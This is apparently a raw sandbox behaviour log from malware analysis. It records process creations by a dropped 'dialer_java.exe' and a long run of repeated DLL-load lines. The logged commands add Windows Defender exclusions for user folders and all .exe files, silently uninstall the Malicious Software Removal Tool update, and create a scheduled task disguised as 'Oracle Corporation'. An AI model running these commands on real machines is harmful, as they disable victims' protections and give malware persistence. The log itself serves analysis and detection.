Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force	Jump to behavior
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart	Jump to behavior
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Process created: C:\Windows\System32\schtasks.exe C:\Windows\system32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\mlothfmoemid.xml"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart	Jump to behavior
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Process created: C:\Windows\System32\schtasks.exe C:\Windows\system32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\mlothfmoemid.xml"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Process created: C:\Windows\System32\schtasks.exe C:\Windows\system32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\mlothfmoemid.xml"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Process created: C:\Windows\System32\schtasks.exe C:\Windows\system32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\mlothfmoemid.xml"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Process created: C:\Windows\System32\schtasks.exe C:\Windows\system32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\mlothfmoemid.xml"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart

Source: C:\Users\user\Desktop\sE5IdDeTp2.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wusa.exe	Section loaded: dpx.dll	Jump to behavior
Source: C:\Windows\System32\wusa.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Windows\System32\wusa.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wusa.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wusa.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\choice.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wusa.exe	Section loaded: dpx.dll	Jump to behavior
Source: C:\Windows\System32\wusa.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Windows\System32\wusa.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wusa.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wusa.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wusa.exe	Section loaded: dpx.dll
Source: C:\Windows\System32\wusa.exe	Section loaded: wtsapi32.dll
Source: C:\Windows\System32\wusa.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\wusa.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wusa.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
